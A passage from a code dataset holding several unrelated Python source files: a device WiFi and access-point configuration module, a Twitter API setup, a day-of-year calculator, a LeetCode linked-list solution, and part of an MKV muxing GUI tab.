Optional\r\n\r\nimport netifaces\r\nfrom sqlalchemy.orm.exc import NoResultFound\r\nfrom sqlalchemy.orm.session import object_session\r\n\r\nfrom fd_device.database.base import get_session\r\nfrom fd_device.database.system import Interface, Wifi\r\nfrom fd_device.network.ethernet import get_external_interface, get_interfaces\r\nfrom fd_device.network.network_files import (\r\n dhcpcd_file,\r\n dnsmasq_file,\r\n hostapd_file,\r\n interface_file,\r\n iptables_file,\r\n wpa_supplicant_file,\r\n)\r\nfrom fd_device.settings import get_config\r\n\r\nlogger = logging.getLogger(\"fd.network.wifi\")\r\n\r\n\r\ndef refresh_interfaces():\r\n \"\"\"Refresh all interfaces. Update with current information.\"\"\"\r\n\r\n session = get_session()\r\n ap_present = False\r\n\r\n interfaces = get_interfaces()\r\n\r\n # update all interfaces.active to be False by default\r\n session.query(Interface).update({Interface.is_active: False})\r\n\r\n for my_interface in interfaces:\r\n try:\r\n interface = session.query(Interface).filter_by(interface=my_interface).one()\r\n\r\n interface.is_active = True\r\n # see if there is an interface that is configured for an ap\r\n if interface.state == \"ap\":\r\n ap_present = True\r\n\r\n # must be a new interface so lets add it\r\n except NoResultFound:\r\n new_interface = Interface(my_interface)\r\n new_interface.is_active = True\r\n new_interface.is_for_fm = False\r\n new_interface.state = \"dhcp\"\r\n session.add(new_interface)\r\n\r\n session.commit()\r\n session.close()\r\n\r\n if ap_present:\r\n set_ap_mode()\r\n else:\r\n set_wpa_mode()\r\n\r\n\r\ndef scan_wifi(interface=None) -> List:\r\n \"\"\"Scan the interface for the available wifi networks.\r\n\r\n Args:\r\n interface (str, optional): the interface to search on. Defaults to None.\r\n if no interface is given, try an interface from the database that is 'dhcp'\r\n\r\n Returns:\r\n List: A list of strings that are the found networks\r\n \"\"\"\r\n\r\n # if no interface is given, try find an interface in the database\r\n # that has the state set to 'dhcp' and is not 'eth'\r\n if interface is None:\r\n session = get_session()\r\n\r\n interfaces = session.query(Interface).all()\r\n for x in interfaces:\r\n if not x.interface.startswith(\"eth\"):\r\n if x.state == \"dhcp\":\r\n interface = x.interface\r\n\r\n session.close()\r\n\r\n # exit if still no interface\r\n if interface is None:\r\n logger.warning(\"No interface available to scan wifi networks\")\r\n return []\r\n\r\n # scan the interface for networks\r\n command = [\"sudo\", \"iwlist\", interface, \"scan\"]\r\n output = subprocess.check_output(command, universal_newlines=True)\r\n index = output.find('ESSID:\"')\r\n ssid = []\r\n while index > 0:\r\n stop = output.find('\"\\n', index)\r\n\r\n ssid.append(output[index + 7 : stop])\r\n\r\n output = output[stop + 2 :]\r\n\r\n index = output.find('ESSID:\"')\r\n\r\n return ssid\r\n\r\n\r\ndef add_wifi_network(\r\n wifi_name: str, wifi_password: str, interface: Interface = None\r\n) -> Optional[Wifi]:\r\n \"\"\"Add a wifi entry to the database of stored WiFi networks.\r\n\r\n Args:\r\n wifi_name (str): The SSID of the WiFi network.\r\n wifi_password (str): The password of the WiFi network.\r\n interface (Interface, optional): The Interface to assign the WiFi to.\r\n If Noine, the first 'wlan' interface set to DHCP is used. Defaults to None.\r\n\r\n Returns:\r\n Optional[Wifi]: The WiFi instance that was created or None if no Interface is found.\r\n \"\"\"\r\n\r\n # if no interface is passed in, create a session and look for a valid interface\r\n if interface is None:\r\n session = get_session()\r\n interfaces = session.query(Interface).all()\r\n for x in interfaces:\r\n # find first available wlan interface that is not dhcp\r\n if x.interface != \"eth0\" and x.state == \"dhcp\":\r\n interface = x\r\n break\r\n # if an interface is passed in, get the session from the interface.\r\n else:\r\n session = object_session(interface)\r\n\r\n if interface is None:\r\n logger.error(\"No interface available to add new wifi network\")\r\n return None\r\n\r\n # have an interface. now create a Wifi entry\r\n new_wifi = Wifi()\r\n new_wifi.name = wifi_name\r\n new_wifi.password = wifi_password\r\n new_wifi.mode = \"dhcp\"\r\n new_wifi.interface = interface\r\n\r\n new_wifi.save(session)\r\n\r\n return new_wifi\r\n\r\n\r\ndef delete_wifi_network(wifi_id: str) -> bool:\r\n \"\"\"Delete a WiFi network.\r\n\r\n Args:\r\n wifi_id (str): The ID of the WiFi netowrk to delete\r\n\r\n Returns:\r\n bool: True if an entry was deleted. False if nothing was deleted.\r\n \"\"\"\r\n\r\n session = get_session()\r\n\r\n deleted_count = session.query(Wifi).filter_by(id=wifi_id).delete()\r\n session.commit()\r\n session.close()\r\n\r\n return bool(deleted_count > 0)\r\n\r\n\r\ndef wifi_info() -> List:\r\n \"\"\"Get a list of WiFi details for all wlan interfaces.\r\n\r\n Returns:\r\n List: For each interface, a dictionary of details is added to the list\r\n Keys of the dictionary are:\r\n interface: the interface\r\n if ap:\r\n clients: the number of clients currently connected\r\n ssid: the ssid of the ap\r\n password: the password of the ap\r\n if dhcp:\r\n state: either the SSID currently connected to or False\r\n state_boolean: boolean value for state. True or False\r\n if state:\r\n address: the IPV4 address\r\n ssid: the ssid of the dhcp interface\r\n password: the password of the dhcp interface\r\n \"\"\"\r\n logger.debug(\"getting wifi information\")\r\n\r\n wlan_interfaces = get_interfaces(keep_eth=False)\r\n\r\n wifi = []\r\n\r\n session = get_session()\r\n\r\n for w_interface in wlan_interfaces:\r\n try:\r\n info = {}\r\n interface = session.query(Interface).filter_by(interface=w_interface).one()\r\n info[\"interface\"] = interface\r\n if interface.state == \"ap\":\r\n info[\"clients\"] = wifi_ap_clients(interface.interface)\r\n info[\"ssid\"] = interface.credentials[0].name\r\n info[\"password\"] = interface.credentials[0].password\r\n else:\r\n info[\"state\"] = wifi_dhcp_info(interface.interface)\r\n if info[\"state\"] is False:\r\n info[\"state_boolean\"] = False\r\n else:\r\n info[\"state_boolean\"] = True\r\n if w_interface in netifaces.interfaces():\r\n address = netifaces.ifaddresses(w_interface)\r\n info[\"address\"] = address[netifaces.AF_INET][0][\"addr\"]\r\n\r\n if interface.credentials:\r\n info[\"ssid\"] = interface.credentials[0].name\r\n info[\"password\"] = interface.credentials[0].password\r\n\r\n wifi.append(info)\r\n\r\n except NoResultFound:\r\n pass\r\n\r\n session.close()\r\n return wifi\r\n\r\n\r\ndef wifi_ap_clients(interface: str) -> int:\r\n \"\"\"Get the list of ap clients an interface has.\r\n\r\n Args:\r\n interface (str): The interface to get the details for.\r\n\r\n Returns:\r\n int: The number of clients connected to the interface.\r\n \"\"\"\r\n\r\n logger.debug(\"getting wifi clients\")\r\n command = [\"iw\", \"dev\", interface, \"station\", \"dump\"]\r\n client_info = subprocess.check_output(command, universal_newlines=True)\r\n\r\n client_count = client_info.count(\"Station\")\r\n\r\n return client_count\r\n\r\n\r\ndef wifi_dhcp_info(interface: str) -> str:\r\n \"\"\"Return the SSID that is connected for a given interface.\r\n\r\n Args:\r\n interface (str): The interface to check. eg. 'wlan0'\r\n\r\n Returns:\r\n str: The SSID for the interface, or 'Not connected' if the interface is not connected.\r\n \"\"\"\r\n\r\n command = [\"iw\", interface, \"link\"]\r\n output = subprocess.check_output(command, universal_newlines=True)\r\n\r\n if output.startswith(\"Not connected.\"):\r\n return \"Not connected\"\r\n\r\n start_index = output.find(\"SSID: \")\r\n end_index = output.find(\"\\n\", start_index)\r\n ssid = output[start_index + 6 : end_index]\r\n\r\n return ssid\r\n\r\n\r\ndef set_interfaces(interfaces: List):\r\n \"\"\"Set interface information into database and configure hardware accordingly.\r\n\r\n Args:\r\n interfaces (List): A list of dictionaries with the required information.\r\n \"\"\"\r\n\r\n session = get_session()\r\n wifi_ap_present = False\r\n\r\n for interface in interfaces:\r\n try:\r\n db_result = (\r\n session.query(Interface).filter_by(interface=interface[\"name\"]).one()\r\n )\r\n except NoResultFound:\r\n db_result = Interface(interface[\"name\"])\r\n session.add(db_result)\r\n db_result.is_active = True\r\n db_result.is_for_fm = interface[\"is_for_fm\"]\r\n db_result.state = interface[\"state\"]\r\n if interface[\"state\"] == \"ap\":\r\n wifi_ap_present = True\r\n if \"creds\" in interface:\r\n add_wifi_network(\r\n wifi_name=interface[\"creds\"][\"ssid\"],\r\n wifi_password=interface[\"creds\"][\"password\"],\r\n interface=db_result,\r\n )\r\n session.commit()\r\n\r\n if wifi_ap_present:\r\n set_ap_mode()\r\n else:\r\n set_wpa_mode()\r\n\r\n\r\ndef set_ap_mode():\r\n \"\"\"Perform the setup and intialization work for interfaces with an ap present.\"\"\"\r\n\r\n logger.debug(\"setting wifi into ap mode\")\r\n session = get_session()\r\n\r\n # get the wlan0 and wlan1 dhcp states\r\n try:\r\n ap_interface = session.query(Interface).filter_by(state=\"ap\").first()\r\n ap_ssid = ap_interface.credentials[0].name\r\n ap_password = ap_interface.credentials[0].password\r\n\r\n except NoResultFound:\r\n # error. abort\r\n logger.warning(\"No interface with state set to 'ap'. Aborting\")\r\n return\r\n\r\n # get info for interface file\r\n if ap_interface.interface == \"wlan0\":\r\n wlan0_dhcp = False\r\n wlan1_dhcp = True\r\n\r\n else:\r\n wlan0_dhcp = True\r\n wlan1_dhcp = False\r\n\r\n # get the info for the wpa_supplicant file\r\n wifi_defs = session.query(Wifi).filter(Wifi.mode != \"ap\").all()\r\n networks = []\r\n for wifi in wifi_defs:\r\n new_network = {}\r\n new_network[\"ssid\"] = wifi.name\r\n new_network[\"password\"] = wifi.password\r\n networks.append(new_network)\r\n\r\n # get the information for the iptables_file\r\n internal_interface = ap_interface.interface\r\n external_interface = get_external_interface()\r\n\r\n iptables_file(external_interface, internal_interface)\r\n interface_file(wlan0_dhcp=wlan0_dhcp, wlan1_dhcp=wlan1_dhcp)\r\n wpa_supplicant_file(networks)\r\n dhcpcd_file(interface=ap_interface.interface)\r\n dnsmasq_file(interface=ap_interface.interface)\r\n hostapd_file(ap_interface.interface, ap_ssid, ap_password)\r\n\r\n config = get_config()\r\n\r\n path = config.APP_DIR + \"/network/ap_script.sh\"\r\n\r\n command = [\"sudo\", \"sh\", path, ap_interface.interface]\r\n subprocess.check_call(command)\r\n\r\n session.close()\r\n\r\n\r\ndef set_wpa_mode():\r\n \"\"\"Perform the setup and intialization work for interfaces with no ap present.\"\"\"\r\n\r\n logger.debug(\"setting all wlan into wpa mode\")\r\n session = get_session()\r\n\r\n # get the info for the wpa_supplicant file\r\n wifi_defs = session.query(Wifi).filter(Wifi.mode != \"ap\").all()\r\n networks = []\r\n for wifi in wifi_defs:\r\n new_network = {}\r\n new_network[\"ssid\"] = wifi.name\r\n new_network[\"password\"] = wifi.password\r\n networks.append(new_network)\r\n\r\n iptables_file(None, None, flush_only=True)\r\n interface_file()\r\n wpa_supplicant_file(networks)\r\n dhcpcd_file()\r\n\r\n config = get_config()\r\n path = config.APP_DIR + \"/network/wpa_script.sh\"\r\n\r\n command = [\"sudo\", \"sh\", path]\r\n subprocess.check_call(command)\r\n session.close()\r\n","repo_name":"nstoik/farm_device","sub_path":"device/fd_device/network/wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"9439676966","text":"import tweepy\nfrom classes.user import User\nfrom config.credentials import API_KEY, API_SECRET, API_TOKEN, API_TOKEN_SECRET, account_name\n\naccount_name = 'Madokera' #Account Name\n\ndef setup(name):\n auth = tweepy.OAuthHandler(API_KEY, API_SECRET)\n auth.set_access_token(API_TOKEN, API_TOKEN_SECRET)\n api = tweepy.API(auth)\n user = User(name, api)\n return api, user\n","repo_name":"lumini23/twitter-morse-tweet-translator","sub_path":"config/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"34985323912","text":"d = int(input('d: '))\nm = int(input('m: '))\ny = int(input('y: '))\n\nday_in_month = ['',31,28,31,30,31,30,31,31,30,31,30,31] \ndate = 0\n\ndef leap_year(y) :\n if (y % 4 == 0 and y % 100 != 0) or (y % 400 == 0):\n return True\n else:\n return False\n\nif leap_year(y) == True :\n day_in_month[2] = 29\n\nfor i in range(1,m) :\n date += day_in_month[i]\n\ndate = date + d\n\nprint(date)\n\n","repo_name":"Paradorn-248/Computer-Programming","sub_path":"lecture01/part2/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"40041378043","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n num1_list = []\n num2_list = []\n\n # Put numbers into stack\n while l1:\n num1_list.append(l1.val)\n l1 = l1.next\n\n while l2:\n num2_list.append(l2.val)\n l2 = l2.next\n\n # Reverse numbers\n num1_list = num1_list[::-1]\n num2_list = num2_list[::-1]\n\n # Create numbers\n num1_str = ''.join(map(str, num1_list))\n num2_str = ''.join(map(str, num2_list))\n num1 = int(num1_str)\n num2 = int(num2_str)\n\n # Add numbers\n num3 = num1 + num2\n\n # Parse result to list\n num3_list = []\n for digit_str in str(num3):\n num3_list.append(int(digit_str))\n \n # Reverse result\n num3_list = num3_list[::-1]\n\n # Create linked list\n result = ListNode()\n cur = result\n for num in num3_list:\n cur.next = ListNode(num)\n cur = cur.next\n\n return result.next","repo_name":"sntnmjones/Leetcode","sub_path":"Problems/AddTwoNumbers/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"12883024922","text":"import os\nimport time\nfrom os import makedirs\nfrom pathlib import Path\nfrom shutil import copy2\n\nfrom PySide2.QtCore import Signal\nfrom PySide2.QtGui import QPaintEvent, QResizeEvent\nfrom PySide2.QtWidgets import (\n QVBoxLayout,\n QGroupBox,\n QFileDialog, QCheckBox, QLineEdit, QSizePolicy, QWidget, QCompleter, )\n\nfrom packages.Startup.DefaultOptions import DefaultOptions\nfrom packages.Startup.PreDefined import AllSubtitlesTracks\nfrom packages.Tabs.GlobalSetting import GlobalSetting, get_file_name_absolute_path, write_to_log_file\nfrom packages.Tabs.MuxSetting.Widgets.AudioTracksCheckableComboBox import AudioTracksCheckableComboBox\nfrom packages.Tabs.MuxSetting.Widgets.ControlQueueButton import ControlQueueButton\nfrom packages.Tabs.MuxSetting.Widgets.JobQueueLayout import JobQueueLayout\nfrom packages.Tabs.MuxSetting.Widgets.MakeThisAudioDefaultCheckBox import MakeThisAudioDefaultCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.MakeThisSubtitleDefaultCheckBox import MakeThisSubtitleDefaultCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.MakeThisTrackDefaultComboBox import MakeThisTrackDefaultComboBox\nfrom packages.Tabs.MuxSetting.Widgets.OnlyKeepThoseAudiosCheckBox import OnlyKeepThoseAudiosCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.OnlyKeepThoseSubtitlesCheckBox import OnlyKeepThoseSubtitlesCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.SubtitleTracksCheckableComboBox import SubtitleTracksCheckableComboBox\nfrom packages.Widgets.ErrorMuxingDialog import ErrorMuxingDialog\nfrom packages.Widgets.FileNotFoundDialog import FileNotFoundDialog\nfrom packages.Widgets.InfoDialog import InfoDialog\nfrom packages.Widgets.InvalidPathDialog import *\n\n\n# noinspection PyAttributeOutsideInit\n\n\ndef get_time():\n t = time.time()\n return str(time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(t)))\n\n\ndef change_global_LogFilePath():\n t = get_time()\n log_file_name = \"muxing_log_file_\" + t + \".txt\"\n GlobalFiles.MuxingLogFilePath = get_file_name_absolute_path(file_name=log_file_name,\n folder_path=GlobalFiles.MergeLogsFolderPath)\n\n\ndef check_is_there_subtitle_to_mux():\n for i in GlobalSetting.SUBTITLE_FILES_LIST.keys():\n if len(GlobalSetting.SUBTITLE_FILES_LIST[i]) > 0:\n return True\n return False\n\n\ndef check_is_there_audio_to_mux():\n for i in GlobalSetting.AUDIO_FILES_LIST.keys():\n if len(GlobalSetting.AUDIO_FILES_LIST[i]) > 0:\n return True\n return False\n\n\n# noinspection PyAttributeOutsideInit\ndef check_if_at_least_one_muxing_setting_has_been_selected():\n if check_is_there_subtitle_to_mux() or \\\n check_is_there_audio_to_mux() or \\\n len(GlobalSetting.ATTACHMENT_FILES_LIST) > 0 or \\\n len(GlobalSetting.CHAPTER_FILES_LIST) > 0 or \\\n GlobalSetting.CHAPTER_DISCARD_OLD or \\\n GlobalSetting.ATTACHMENT_DISCARD_OLD or \\\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_ENABLED or \\\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_ENABLED or \\\n GlobalSetting.MUX_SETTING_MAKE_THIS_AUDIO_DEFAULT_TRACK != \"\" or \\\n GlobalSetting.MUX_SETTING_MAKE_THIS_SUBTITLE_DEFAULT_TRACK != \"\" or \\\n GlobalSetting.VIDEO_DEFAULT_DURATION_FPS not in [\"\", \"Default\"]:\n return True\n else:\n no_setting_to_apply_dialog = InfoDialog(window_title=\"No Setting Selected\",\n info_message=\"You haven't select any \"\n \"setting to apply\")\n no_setting_to_apply_dialog.execute()\n return False\n\n\ndef check_if_all_input_videos_are_found():\n for video_file in GlobalSetting.VIDEO_FILES_ABSOLUTE_PATH_LIST:\n if not Path.is_file(Path(video_file)):\n invalid_dialog = FileNotFoundDialog(window_title=\"File Not Found\",\n error_message=\"File: \\\"\" + video_file + \"\\\" is not found\")\n invalid_dialog.execute()\n return False\n return True\n\n\ndef check_if_want_to_keep_log_file():\n if GlobalSetting.MUX_SETTING_KEEP_LOG_FILE:\n try:\n copy2(GlobalFiles.MuxingLogFilePath, GlobalSetting.DESTINATION_FOLDER_PATH)\n except Exception as e:\n write_to_log_file(e)\n error_dialog = ErrorMuxingDialog(window_title=\"Permission Denied\",\n info_message=\"Can't save log file, MKV Muxing Batch GUI lacks write \"\n \"permissions on Destination folder\")\n error_dialog.execute()\n\n\nclass MuxSettingTab(QWidget):\n tab_clicked_signal = Signal()\n start_muxing_signal = Signal()\n update_task_bar_progress_signal = Signal(int)\n update_task_bar_paused_signal = Signal()\n update_task_bar_clear_signal = Signal()\n\n def __init__(self):\n super().__init__()\n self.create_widgets()\n self.setup_widgets()\n self.connect_signals()\n\n def connect_signals(self):\n self.tab_clicked_signal.connect(self.tab_clicked)\n\n self.destination_path_button.clicked.connect(self.open_select_destination_folder_dialog)\n\n self.only_keep_those_audios_checkBox.stateChanged.connect(\n self.only_keep_those_audios_multi_choose_comboBox.check_box_state_changed)\n\n self.only_keep_those_subtitles_checkBox.stateChanged.connect(\n self.only_keep_those_subtitles_multi_choose_comboBox.check_box_state_changed)\n\n self.make_this_audio_default_checkBox.disable_combo_box.connect(self.disable_make_this_audio_default_comboBox)\n\n self.make_this_subtitle_default_checkBox.disable_combo_box.connect(\n self.disable_make_this_subtitle_default_comboBox)\n\n self.control_queue_button.add_to_queue_clicked_signal.connect(self.add_to_queue_button_clicked)\n self.control_queue_button.start_multiplexing_clicked_signal.connect(self.start_multiplexing_button_clicked)\n self.control_queue_button.pause_multiplexing_clicked_signal.connect(self.pause_multiplexing_button_clicked)\n\n self.clear_job_queue_button.clicked.connect(self.clear_job_queue_button_clicked)\n\n self.only_keep_those_audios_multi_choose_comboBox.closeList.connect(self.only_keep_those_audios_close_list)\n self.only_keep_those_audios_multi_choose_comboBox.audio_tracks_changed_signal.connect(\n self.make_this_audio_default_comboBox.addItems)\n self.only_keep_those_subtitles_multi_choose_comboBox.subtitle_tracks_changed_signal.connect(\n self.make_this_subtitle_default_comboBox.addItems)\n\n self.only_keep_those_subtitles_multi_choose_comboBox.closeList.connect(\n self.only_keep_those_subtitles_close_list)\n\n self.make_this_audio_default_comboBox.currentTextChanged.connect(\n self.make_this_audio_default_comboBox_text_changed)\n\n self.make_this_subtitle_default_comboBox.currentTextChanged.connect(\n self.make_this_subtitle_default_comboBox_text_changed)\n\n self.abort_on_errors_checkBox.stateChanged.connect(self.abort_on_errors_state_changed)\n self.add_crc_checksum_checkBox.stateChanged.connect(self.add_crc_checksum_state_changed)\n self.remove_old_crc_checksum_checkBox.stateChanged.connect(self.remove_old_crc_checksum_state_changed)\n\n self.keep_log_file_checkBox.stateChanged.connect(self.keep_log_file_state_changed)\n self.job_queue_layout.update_task_bar_progress_signal.connect(self.update_task_bar_progress)\n self.job_queue_layout.paused_done_signal.connect(self.paused_done)\n self.job_queue_layout.cancel_done_signal.connect(self.cancel_done)\n self.job_queue_layout.finished_all_jobs_signal.connect(self.finished_all_jobs)\n self.job_queue_layout.pause_from_error_occurred_signal.connect(self.pause_multiplexing_button_clicked)\n\n def setup_widgets(self):\n self.setup_mux_setting_groupBox()\n self.setup_job_queue_groupBox()\n self.setup_destination_path_label()\n self.setup_destination_path_lineEdit()\n self.setup_destination_path_button()\n self.setup_abort_on_errors_checkBox()\n self.setup_discard_old_attachments_checkBox()\n self.setup_keep_log_file_checkBox()\n self.setup_add_crc_checksum_checkBox()\n self.setup_remove_old_crc_checkBox()\n self.setup_clear_job_queue_button()\n self.setup_tool_tip_hint()\n self.setup_layouts()\n\n def setup_layouts(self):\n self.setup_MainLayout()\n self.mux_setting_groupBox.setLayout(self.mux_setting_layout)\n self.job_queue_groupBox.setLayout(self.job_queue_layout)\n self.setup_mux_tools_layout_first_row()\n self.setup_mux_tools_layout_second_row()\n self.setup_mux_setting_layout()\n self.setLayout(self.MainLayout)\n\n # noinspection PyAttributeOutsideInit\n def create_widgets(self):\n self.MainLayout = QVBoxLayout()\n self.mux_setting_groupBox = QGroupBox(self)\n self.job_queue_groupBox = QGroupBox(self)\n self.mux_setting_layout = QGridLayout()\n self.job_queue_layout = JobQueueLayout()\n self.destination_path_label = QLabel()\n self.destination_path_lineEdit = QLineEdit()\n self.destination_path_button = QPushButton()\n self.only_keep_those_audios_checkBox = OnlyKeepThoseAudiosCheckBox()\n self.only_keep_those_subtitles_checkBox = OnlyKeepThoseSubtitlesCheckBox()\n self.only_keep_those_audios_multi_choose_comboBox = AudioTracksCheckableComboBox()\n self.only_keep_those_subtitles_multi_choose_comboBox = SubtitleTracksCheckableComboBox()\n self.make_this_audio_default_checkBox = MakeThisAudioDefaultCheckBox()\n self.make_this_subtitle_default_checkBox = MakeThisSubtitleDefaultCheckBox()\n self.make_this_audio_default_comboBox = MakeThisTrackDefaultComboBox()\n self.make_this_subtitle_default_comboBox = MakeThisTrackDefaultComboBox()\n self.abort_on_errors_checkBox = QCheckBox()\n self.discard_old_attachments_checkBox = QCheckBox()\n self.keep_log_file_checkBox = QCheckBox()\n self.add_crc_checksum_checkBox = QCheckBox()\n self.remove_old_crc_checksum_checkBox = QCheckBox()\n self.control_queue_button = ControlQueueButton()\n self.clear_job_queue_button = QPushButton()\n self.mux_tools_layout_first_row = QHBoxLayout()\n self.mux_tools_layout_second_row = QHBoxLayout()\n self.job_queue_tools_layout = QHBoxLayout()\n\n def setup_mux_setting_layout(self):\n self.mux_setting_layout.addWidget(self.destination_path_label, 0, 0)\n self.mux_setting_layout.addWidget(self.destination_path_lineEdit, 0, 1)\n self.mux_setting_layout.addWidget(self.destination_path_button, 0, 2)\n self.mux_setting_layout.addWidget(self.only_keep_those_audios_checkBox, 1, 0)\n self.mux_setting_layout.addWidget(self.only_keep_those_subtitles_checkBox, 2, 0)\n self.mux_setting_layout.addLayout(self.mux_tools_layout_first_row, 1, 1)\n self.mux_setting_layout.addLayout(self.mux_tools_layout_second_row, 2, 1)\n\n def setup_mux_tools_layout_first_row(self):\n self.mux_tools_layout_first_row.addWidget(self.only_keep_those_audios_multi_choose_comboBox, 2)\n self.mux_tools_layout_first_row.addWidget(self.make_this_audio_default_checkBox, 1)\n self.mux_tools_layout_first_row.addWidget(self.make_this_audio_default_comboBox, 2)\n self.mux_tools_layout_first_row.addWidget(self.add_crc_checksum_checkBox)\n self.mux_tools_layout_first_row.addWidget(self.abort_on_errors_checkBox, 1)\n self.mux_tools_layout_first_row.addWidget(self.clear_job_queue_button, stretch=0)\n\n def setup_mux_tools_layout_second_row(self):\n self.mux_tools_layout_second_row.addWidget(self.only_keep_those_subtitles_multi_choose_comboBox, 2)\n self.mux_tools_layout_second_row.addWidget(self.make_this_subtitle_default_checkBox, 1)\n self.mux_tools_layout_second_row.addWidget(self.make_this_subtitle_default_comboBox, 2)\n self.mux_tools_layout_second_row.addWidget(self.remove_old_crc_checksum_checkBox, 1)\n self.mux_tools_layout_second_row.addWidget(self.keep_log_file_checkBox)\n self.mux_tools_layout_second_row.addWidget(self.control_queue_button)\n\n def setup_clear_job_queue_button(self):\n self.clear_job_queue_button.setText(\"Clear All\")\n self.clear_job_queue_button.setIcon(GlobalFiles.CleanIcon)\n self.clear_job_queue_button.setDisabled(True)\n\n def setup_add_crc_checksum_checkBox(self):\n self.add_crc_checksum_checkBox.setText(\"Add CRC checksum\")\n self.add_crc_checksum_checkBox.setToolTip(\"Add CRC checksum to the end of output file's name\")\n\n def setup_remove_old_crc_checkBox(self):\n self.remove_old_crc_checksum_checkBox.setText(\"Remove Old CRC \")\n self.remove_old_crc_checksum_checkBox.setToolTip(\n \"Remove Old CRC from the end of the file (will do nothing if there is \"\n \"none)\")\n\n def setup_keep_log_file_checkBox(self):\n self.keep_log_file_checkBox.setText(\"Keep Log File\")\n self.keep_log_file_checkBox.setToolTip(\"log file will located in the source folder after finished muxing\")\n\n def setup_discard_old_attachments_checkBox(self):\n self.discard_old_attachments_checkBox.setText(\"Discard Old Attachments \")\n\n def setup_abort_on_errors_checkBox(self):\n self.abort_on_errors_checkBox.setText(\"Abort On Errors\")\n self.abort_on_errors_checkBox.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Preferred)\n\n def setup_destination_path_button(self):\n self.destination_path_button.setIcon(GlobalFiles.SelectFolderIcon)\n\n def setup_destination_path_lineEdit(self):\n self.destination_path_lineEdit.setPlaceholderText(\"Enter Destination Folder Path\")\n self.destination_path_lineEdit.setClearButtonEnabled(True)\n\n def setup_destination_path_label(self):\n self.destination_path_label.setText(\"Videos Destination Folder :\")\n\n def setup_MainLayout(self):\n self.MainLayout.addWidget(self.mux_setting_groupBox)\n self.MainLayout.addWidget(self.job_queue_groupBox)\n\n def setup_job_queue_groupBox(self):\n self.job_queue_groupBox.setTitle(\"Job Queue\")\n\n def setup_mux_setting_groupBox(self):\n self.mux_setting_groupBox.setTitle(\"Mux Setting\")\n\n def paintEvent(self, event: QPaintEvent):\n self.update_widgets_size()\n super().paintEvent(event)\n\n def resizeEvent(self, event: QResizeEvent):\n self.job_queue_layout.update_layout()\n super().resizeEvent(event)\n\n def update_widgets_size(self):\n self.only_keep_those_subtitles_multi_choose_comboBox.resize(\n self.only_keep_those_audios_multi_choose_comboBox.width(),\n self.only_keep_those_audios_multi_choose_comboBox.height(),\n )\n\n self.make_this_subtitle_default_checkBox.resize(\n self.make_this_audio_default_checkBox.width(),\n self.make_this_audio_default_checkBox.height(),\n )\n self.make_this_subtitle_default_checkBox.move(\n self.make_this_audio_default_checkBox.x(),\n self.make_this_subtitle_default_checkBox.y(),\n )\n\n self.make_this_subtitle_default_comboBox.resize(\n self.make_this_audio_default_comboBox.width(),\n self.make_this_audio_default_comboBox.height(),\n )\n self.make_this_subtitle_default_comboBox.move(\n self.make_this_audio_default_comboBox.x(),\n self.make_this_subtitle_default_comboBox.y(),\n )\n\n self.remove_old_crc_checksum_checkBox.move(\n self.add_crc_checksum_checkBox.x(),\n self.add_crc_checksum_checkBox.y() + self.add_crc_checksum_checkBox.height() + 9,\n )\n self.keep_log_file_checkBox.move(\n self.abort_on_errors_checkBox.x(),\n self.abort_on_errors_checkBox.y() + self.abort_on_errors_checkBox.height() + 8,\n )\n self.control_queue_button.move(\n self.clear_job_queue_button.x(),\n self.clear_job_queue_button.y() + self.clear_job_queue_button.height() + 5,\n )\n\n self.clear_job_queue_button.resize(\n self.control_queue_button.width(),\n self.control_queue_button.height(),\n )\n self.clear_job_queue_button.setFixedWidth(self.control_queue_button.width())\n\n def open_select_destination_folder_dialog(self):\n temp_folder_path = QFileDialog.getExistingDirectory(self, caption=\"Choose Destination Folder\",\n dir=GlobalSetting.LAST_DIRECTORY_PATH, )\n if temp_folder_path == \"\" or temp_folder_path.isspace():\n return\n elif Path(temp_folder_path) in GlobalSetting.VIDEO_SOURCE_PATHS:\n invalid_dialog = InvalidPathDialog(\n error_message=\"Some Source and destination videos are in the same folder\")\n invalid_dialog.execute()\n return\n else:\n self.destination_path_lineEdit.setText(str(Path(temp_folder_path)))\n GlobalSetting.LAST_DIRECTORY_PATH = self.destination_path_lineEdit.text()\n GlobalSetting.DESTINATION_FOLDER_PATH = self.destination_path_lineEdit.text()\n\n def check_destination_path(self):\n temp_destination_path = self.destination_path_lineEdit.text()\n try:\n if temp_destination_path == \"\" or temp_destination_path.isspace():\n temp_destination_path = \"[Empty Path]\"\n raise Exception(\n \"[WinError 998] Empty path is Not a valid path : \" + temp_destination_path)\n # check if system is windows so path must have # SOME_LETTER:\\\n if os.name == 'nt':\n if temp_destination_path[1:3] != \":\\\\\" and self.destination_path_lineEdit.text()[\n 1:3] != \":/\":\n raise Exception(\"[WinError 999] Not a valid path : \" + temp_destination_path)\n makedirs(temp_destination_path, exist_ok=True)\n ## test if i can write into this path:\n test_file_name = str(time.time()) + \".txt\"\n test_file_name_absolute = os.path.join(Path(temp_destination_path), Path(test_file_name))\n try:\n with open(test_file_name_absolute, 'w+') as test_file:\n test_file.write(\"Test\")\n os.remove(test_file_name_absolute)\n except Exception as e:\n write_to_log_file(e)\n invalid_dialog = InvalidPathDialog(window_title=\"Permission Denied\",\n error_message=\"MKV Muxing Batch GUI lacks 